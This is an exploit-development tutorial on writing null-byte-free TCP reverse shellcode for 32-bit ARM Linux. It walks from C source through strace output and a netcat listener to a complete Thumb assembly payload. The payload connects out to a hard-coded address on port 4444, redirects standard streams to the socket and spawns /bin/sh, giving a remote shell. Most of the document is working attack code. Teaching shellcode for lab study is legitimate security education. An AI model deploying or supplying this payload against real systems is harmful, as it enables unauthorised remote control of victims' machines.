In this tutorial, you will learn how to write TCP reverse shellcode that is free of null bytes. If you want to start small, you can learn how to write a simple execve() shell in assembly before diving into this slightly more extensive tutorial. If you need a refresher in Arm assembly, take a look at my ARM Assembly Basics tutorial series, or use this Cheat Sheet:
Before we start, I’d like to remind you that you’re creating ARM shellcode and therefore need to set up an ARM lab environment if you don’t already have one. You can set it up yourself (Emulate Raspberry Pi with QEMU) or save time and download the ready-made Lab VM I created (ARM Lab VM). Ready?
First of all, what is a reverse shell and how does it really work? Reverse shells force an internal system to actively connect out to an external system. In that case, your machine has a listener port on which it receives the connection back from the target system.
Since it is more common that the firewall of the target network fails to block outgoing connections, one can take advantage of this misconfiguration by using a reverse shell (as opposed to a bind shell, which requires incoming connections to be allowed on the target system).
This is the C code we will use for our translation.
    #include <stdio.h>
    #include <unistd.h>
    #include <arpa/inet.h>   // htons(), inet_addr()
    #include <sys/socket.h>
    #include <netinet/in.h>

    int main(void)
    {
        int sockfd;               // socket file descriptor
        socklen_t socklen;        // socket length for new connections
        struct sockaddr_in addr;  // address of the listener we connect back to

        addr.sin_family = AF_INET;                      // address family = Internet Protocol
        addr.sin_port = htons( 1337 );                  // connect-back port, converted to network byte order
        addr.sin_addr.s_addr = inet_addr("127.0.0.1");  // connect-back IP, converted to network byte order

        // create new TCP socket
        sockfd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP );

        // connect socket
        connect(sockfd, (struct sockaddr *)&addr, sizeof(addr));

        // duplicate file descriptors for STDIN, STDOUT and STDERR
        dup2(sockfd, 0);
        dup2(sockfd, 1);
        dup2(sockfd, 2);

        // spawn shell
        execve( "/bin/sh", NULL, NULL );
    }
The first step is to identify the necessary system functions, their parameters, and their system call numbers. Looking at the C code above, we can see that we need the following functions: socket, connect, dup2, execve. You can figure out the system call numbers of these functions with the following command:
    pi@raspberrypi:~/bindshell $ cat /usr/include/arm-linux-gnueabihf/asm/unistd.h | grep socket
    #define __NR_socketcall (__NR_SYSCALL_BASE+102)
    #define __NR_socket (__NR_SYSCALL_BASE+281)
    #define __NR_socketpair (__NR_SYSCALL_BASE+288)
    #undef __NR_socketcall
These are all the syscall numbers we'll need:
    #define __NR_socket  (__NR_SYSCALL_BASE+281)
    #define __NR_connect (__NR_SYSCALL_BASE+283)
    #define __NR_dup2    (__NR_SYSCALL_BASE+ 63)
    #define __NR_execve  (__NR_SYSCALL_BASE+ 11)
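If you would rather let the compiler tell you these numbers than grep the headers, a minimal sketch like the following may help. It assumes a Linux toolchain that ships `<sys/syscall.h>`; the helper name `print_syscall_numbers` is made up for this illustration. The values it prints belong to whatever architecture you compile for, so they should only match the list above when built on (or for) the 32-bit ARM target.

```c
#include <stdio.h>
#include <sys/syscall.h>   /* SYS_* constants for the architecture being compiled for */

/* Hypothetical helper (not part of the tutorial): prints the numbers of the
 * four syscalls used here and returns how many of them this architecture
 * defines. The #ifdef guards exist because some architectures lack some of
 * these calls (for example, no dup2 on 64-bit ARM). */
int print_syscall_numbers(void)
{
    int found = 0;
#ifdef SYS_socket
    printf("socket  = %ld\n", (long)SYS_socket);
    found++;
#endif
#ifdef SYS_connect
    printf("connect = %ld\n", (long)SYS_connect);
    found++;
#endif
#ifdef SYS_dup2
    printf("dup2    = %ld\n", (long)SYS_dup2);
    found++;
#endif
#ifdef SYS_execve
    printf("execve  = %ld\n", (long)SYS_execve);
    found++;
#endif
    return found;
}
```

Call `print_syscall_numbers()` from a small `main` on the target and compare the output with the defines above.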
The parameters each function expects can be looked up in the Linux man pages, or on w3challs.com.
The next step is to figure out the specific values of these parameters. One way of doing that is to look at a successful reverse shell connection using strace. Strace is a tool you can use to trace system calls and monitor interactions between processes and the Linux kernel. Let's use strace to test the C version of our reverse shell. To reduce the noise, we limit the output to the functions we're interested in.
Terminal 1:

    pi@raspberrypi:~/reverseshell $ gcc reverse.c -o reverse
    pi@raspberrypi:~/reverseshell $ strace -e execve,socket,connect,dup2 ./reverse

Terminal 2:

    user@ubuntu:~$ nc -lvvp 4444
    Listening on [0.0.0.0] (family 0, port 4444)
    Connection from [192.168.139.130] port 4444 [tcp/*] accepted (family 2, sport 38010)
This is our strace output:
    pi@raspberrypi:~/reverseshell $ strace -e execve,socket,connect,dup2 ./reverse
    execve("./reverse", ["./reverse"], [/* 49 vars */]) = 0
    socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
    connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.139.130")}, 16) = 0
    dup2(3, 0) = 0
    dup2(3, 1) = 1
    dup2(3, 2) = 2
    execve("/bin/sh", [0], [/* 0 vars */]) = 0
Now we can fill in the gaps and note down the values we'll need to pass to the functions of our assembly reverse shell.
In the first stage, we answered the following questions to get everything we need for our assembly program:
1. Which functions do I need?
2. What are the system call numbers of these functions?
3. What are the parameters of these functions?
4. What are the values of these parameters?
This step is about applying this knowledge and translating it to assembly. Split each function into a separate chunk and repeat the following process:
1. Map out which register you want to use for which parameter
2. Figure out how to pass the required values to these registers
   1. How to pass an immediate value to a register
   2. How to nullify a register without directly moving a #0 into it (we need to avoid null bytes in our code and must therefore find other ways to nullify a register or a value in memory)
   3. How to make a register point to a region in memory which stores constants and strings
3. Use the right system call number to invoke the function and keep track of register content changes
   1. Keep in mind that the result of a system call will land in r0, which means that if you need to reuse that result in a later function, you need to save it into another register before invoking the next function.
   2. Example: sockfd = socket(2, 1, 0): the result (sockfd) of the socket call will land in r0. This result is reused in other functions like dup2(sockfd, 0), and should therefore be preserved in another register.
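To make the null-byte concern from the list above concrete, here is a minimal sketch of a scanner you could run over assembled bytes. The function name `first_null_byte` and the two sample arrays are made up for this illustration. The samples are the little-endian encodings of an ARM-mode `mov r0, #0` (0xe3a00000) and of the Thumb `sub r2, r2` (0x1a92) used later in this tutorial.

```c
#include <stddef.h>

/* Hypothetical helper: returns the index of the first 0x00 byte in buf,
 * or -1 if the buffer contains no null byte at all. */
long first_null_byte(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++) {
        if (buf[i] == 0x00)
            return (long)i;
    }
    return -1;
}

/* ARM mode "mov r0, #0" = 0xe3a00000, stored little-endian: has null bytes. */
static const unsigned char arm_mov_r0_0[] = { 0x00, 0x00, 0xa0, 0xe3 };

/* Thumb mode "sub r2, r2" = 0x1a92, stored little-endian: no null bytes. */
static const unsigned char thumb_sub_r2_r2[] = { 0x92, 0x1a };
```

Running `first_null_byte` on the first array reports index 0, while the second array comes back clean, which is why the tutorial clears registers by subtracting them from themselves rather than moving #0 into them.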
The first thing you should do to reduce the chance of encountering null bytes is to use Thumb mode. In ARM mode, instructions are 32 bits wide; in Thumb mode they are 16 bits wide. Simply shrinking the instructions already lowers the chance of a null byte showing up in their encoding. To recap how to switch to Thumb mode: ARM instructions must be 4-byte aligned. To change the mode from ARM to Thumb, set the LSB (Least Significant Bit) of the next instruction's address (found in PC) to 1 by adding 1 to the PC register's value and saving the result to another register. Then use a BX (Branch and eXchange) instruction to branch to that register; because the address it holds has its LSB set to 1, the processor switches to Thumb mode. It all boils down to the following two instructions.
    .section .text
    .global _start
    _start:
        .ARM
        add r3, pc, #1
        bx r3
From here on you will be writing Thumb code and therefore need to indicate this with the .THUMB directive in your code.
These are the values we need for the socket call parameters:
    root@raspberrypi:/home/pi# grep -R "AF_INET\|PF_INET \|SOCK_STREAM =\|IPPROTO_IP =" /usr/include/
    /usr/include/linux/in.h: IPPROTO_IP = 0, // Dummy protocol for TCP
    /usr/include/arm-linux-gnueabihf/bits/socket_type.h: SOCK_STREAM = 1, // Sequenced, reliable, connection-based
    /usr/include/arm-linux-gnueabihf/bits/socket.h:#define PF_INET 2 // IP protocol family.
    /usr/include/arm-linux-gnueabihf/bits/socket.h:#define AF_INET PF_INET
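As a cross-check on the grep output, the same three constants can be read straight from the headers in C. This is only a sketch, assuming a Linux system with the usual glibc headers; the helper name `socket_call_args` is invented for this example.

```c
#include <netinet/in.h>   /* IPPROTO_IP */
#include <sys/socket.h>   /* AF_INET, SOCK_STREAM */

/* Hypothetical helper: stores the three arguments of
 * socket(AF_INET, SOCK_STREAM, IPPROTO_IP) as plain integers, i.e. the
 * values that end up in r0, r1 and r2 in the assembly version. */
void socket_call_args(int args[3])
{
    args[0] = AF_INET;      /* address family   -> r0 */
    args[1] = SOCK_STREAM;  /* socket type      -> r1 */
    args[2] = IPPROTO_IP;   /* protocol         -> r2 */
}
```

On Linux this should yield 2, 1 and 0, matching the header lines found by grep.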
After setting up the parameters, you invoke the socket system call with the svc instruction. The result of this invocation will be our sockfd and will end up in r0. Since we need sockfd later on, let's save it to r4.
In ARMv7+ you can use the movw instruction to put any 16-bit immediate value into a register. In ARMv6, you can't simply move any immediate value into a register and must split it into two smaller values. If you're interested in more details about this nuance, there is a section in the Memory Instructions chapter (at the very end).
To check if I can use a certain immediate value, I wrote a tiny script (ugly code, don't look) called rotator.py.
    pi@raspberrypi:~ $ python rotator.py
    Enter the value you want to check: 281
    Sorry, 281 cannot be used as an immediate number and has to be split.

    pi@raspberrypi:~ $ python rotator.py
    Enter the value you want to check: 200
    The number 200 can be used as a valid immediate number.
    50 ror 30 --> 200

    pi@raspberrypi:~ $ python rotator.py
    Enter the value you want to check: 81
    The number 81 can be used as a valid immediate number.
    81 ror 0 --> 81
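The source of rotator.py is not shown here, so the following is not that script. It is a minimal C sketch of the rule such a check is presumably based on: in ARM mode, a data-processing immediate must be an 8-bit value rotated right by an even number of bits. The names `rol32` and `arm_imm_encodable` are made up for this illustration.

```c
#include <stdbool.h>
#include <stdint.h>

/* Rotate a 32-bit value left by n bits (n is reduced modulo 32). */
static uint32_t rol32(uint32_t v, unsigned n)
{
    n &= 31;
    return n ? (v << n) | (v >> (32 - n)) : v;
}

/* Hypothetical helper: returns true if value can be written as
 * "imm8 ror rot" with imm8 in 0..255 and rot an even number in 0..30.
 * On success the first encoding found is stored in *imm8 and *rot
 * (either pointer may be NULL if the caller does not need it). */
bool arm_imm_encodable(uint32_t value, uint8_t *imm8, unsigned *rot)
{
    for (unsigned r = 0; r < 32; r += 2) {
        /* Rotating left by r undoes a rotate-right by r. */
        uint32_t candidate = rol32(value, r);
        if (candidate <= 0xff) {
            if (imm8)
                *imm8 = (uint8_t)candidate;
            if (rot)
                *rot = r;
            return true;
        }
    }
    return false;
}
```

With this sketch, 281 is rejected while 200 and 81 are accepted, in line with the output above. A value can have more than one valid encoding: the sketch reports 200 as `200 ror 0`, whereas the script printed the equivalent `50 ror 30`. Note also that the 16-bit Thumb `mov` and `add` used in this tutorial only take immediates from 0 to 255, so splitting 281 into 200 + 81 satisfies that limit as well.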
Final code snippet (ARMv6 version):
    .THUMB
    mov r0, #2
    mov r1, #1
    sub r2, r2
    mov r7, #200
    add r7, #81     // r7 = 281 (socket syscall number)
    svc #1          // r0 = sockfd value
    mov r4, r0      // save sockfd in r4
With the first instruction, we put the address of a structure object (containing the address family, host port and host address), which is stored in the literal pool, into R1. The literal pool is a memory area in the same section (because the literal pool is part of the code) that stores constants, strings, or offsets. Instead of calculating the PC-relative offset manually, you can use an ADR instruction with a label. ADR accepts a PC-relative expression, that is, a label with an optional offset, where the address of the label is relative to the PC. Like this:
    // connect(r0, &sockaddr, 16)
    adr r1, struct          // pointer to struct
    [...]
    struct:
    .ascii "\x02\xff"       // AF_INET 0xff will be NULLed
    .ascii "\x11\x5c"       // port number 4444
    .byte 192,168,139,130   // IP Address
In the first instruction we made R1 point to the memory region where we store the values of the address family AF_INET, the port we want to connect back to, and the IP address. The STRB instruction replaces the placeholder \xff in \x02\xff with \x00 to set AF_INET to \x02\x00.
A STRB instruction stores one byte from a register to a calculated memory address. The syntax [r1, #1] means that we take R1 as the base address and the immediate value (#1) as an offset. How do we know that it's a null byte being stored? Because r2 contains only zeros: the "sub r2, r2" instruction in the socket block cleared the register, and our code has not written to r2 since.
The mov instruction puts the length of the sockaddr struct (2 bytes for AF_INET, 2 bytes for the port, 4 bytes for the IP address, 8 bytes of padding = 16 bytes) into r2. Then, we set r7 to 283 by simply adding 2 to it, because r7 still contains 281 from the last syscall.
    // connect(r0, &sockaddr, 16)
    adr r1, struct      // pointer to struct
    strb r2, [r1, #1]   // write 0 for AF_INET
    mov r2, #16         // struct length
    add r7, #2          // r7 = 281+2 = 283 (connect syscall number)
    svc #1
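If you want to convince yourself that the hand-written bytes in the struct really are what connect() expects, you can let C build the same sockaddr_in and dump it. This is a sketch only: it assumes a little-endian Linux host (as on the Raspberry Pi), uses the port and IP address from the strace run, and the helper name `fill_sockaddr_bytes` is made up for this example.

```c
#include <arpa/inet.h>    /* htons(), inet_addr() */
#include <netinet/in.h>   /* struct sockaddr_in */
#include <string.h>       /* memset(), memcpy() */
#include <sys/socket.h>   /* AF_INET */

/* Hypothetical helper: builds the sockaddr_in for 192.168.139.130:4444 and
 * copies its raw bytes into out. Returns the struct size (expected: 16),
 * or 0 if the output buffer is too small. */
size_t fill_sockaddr_bytes(unsigned char *out, size_t out_len)
{
    struct sockaddr_in addr;

    memset(&addr, 0, sizeof(addr));                       /* zero the padding too */
    addr.sin_family = AF_INET;                            /* 02 00 on little-endian */
    addr.sin_port = htons(4444);                          /* 11 5c (network byte order) */
    addr.sin_addr.s_addr = inet_addr("192.168.139.130");  /* c0 a8 8b 82 */

    if (out_len < sizeof(addr))
        return 0;
    memcpy(out, &addr, sizeof(addr));
    return sizeof(addr);
}
```

The first eight bytes should read 02 00 11 5c c0 a8 8b 82. That is exactly the struct from the assembly once the STRB instruction has replaced the \xff placeholder with \x00, and the returned size of 16 is the value moved into r2.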
The execve() function we use in this example follows the same process as in the Writing ARM Shellcode tutorial where everything is explained step by step.
Finally, we put the value AF_INET (with 0xff, which will be replaced by a null), the port number, the IP address, and the "/bin/shX" string (whose X will also be replaced by a null) at the end of our assembly code.
    struct:
    .ascii "\x02\xff"       // AF_INET 0xff will be NULLed
    .ascii "\x11\x5c"       // port number 4444
    .byte 192,168,139,130   // IP Address
    binsh:
    .ascii "/bin/shX"
    .section .text
    .global _start
    _start:
        .ARM
        add r3, pc, #1      // switch to thumb mode
        bx r3

        .THUMB
    // socket(2, 1, 0)
        mov r0, #2
        mov r1, #1
        sub r2, r2
        mov r7, #200
        add r7, #81         // r7 = 281 (socket)
        svc #1              // r0 = resultant sockfd
        mov r4, r0          // save sockfd in r4

    // connect(r0, &sockaddr, 16)
        adr r1, struct      // pointer to address, port
        strb r2, [r1, #1]   // write 0 for AF_INET
        mov r2, #16
        add r7, #2          // r7 = 283 (connect)
        svc #1

    // dup2(sockfd, 0)
        mov r7, #63         // r7 = 63 (dup2)
        mov r0, r4          // r4 is the saved sockfd
        sub r1, r1          // r1 = 0 (stdin)
        svc #1

    // dup2(sockfd, 1)
        mov r0, r4          // r4 is the saved sockfd
        mov r1, #1          // r1 = 1 (stdout)
        svc #1

    // dup2(sockfd, 2)
        mov r0, r4          // r4 is the saved sockfd
        mov r1, #2          // r1 = 2 (stderr)
        svc #1

    // execve("/bin/sh", 0, 0)
        adr r0, binsh
        sub r2, r2
        sub r1, r1
        strb r2, [r0, #7]
        mov r7, #11         // r7 = 11 (execve)
        svc #1

    struct:
    .ascii "\x02\xff"       // AF_INET 0xff will be NULLed
    .ascii "\x11\x5c"       // port number 4444
    .byte 192,168,139,130   // IP Address
    binsh:
    .ascii "/bin/shX"